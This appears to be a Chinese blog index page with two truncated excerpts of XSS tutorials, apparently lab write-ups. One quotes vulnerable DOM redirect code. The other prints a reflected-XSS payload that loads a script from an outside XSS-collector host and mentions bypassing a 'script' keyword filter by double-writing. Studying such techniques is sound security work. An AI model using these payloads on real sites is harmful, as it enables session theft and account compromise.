摘要: 前文:DOM反射XSS 进入网站,直接查看源代码,下面是关键代码,这里有xss漏洞: <script> var target = location.search.split("=") if (target[0].slice(1) == "jumpto") { location.href = targ 阅读全文
posted @ 2023-07-05 03:05 CVE-柠檬i 阅读(458) 评论(0) 推荐(0)
摘要: 前文链接:DOM反射xss 这次直接浏览器输入payload,发现 script 被过滤掉了 </textarea>'"><script src=http://xsscom.com//cZ2vvZ></script> 碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。 双写绕过 </textare 阅读全文
posted @ 2023-07-05 00:42 CVE-柠檬i 阅读(84) 评论(0) 推荐(0)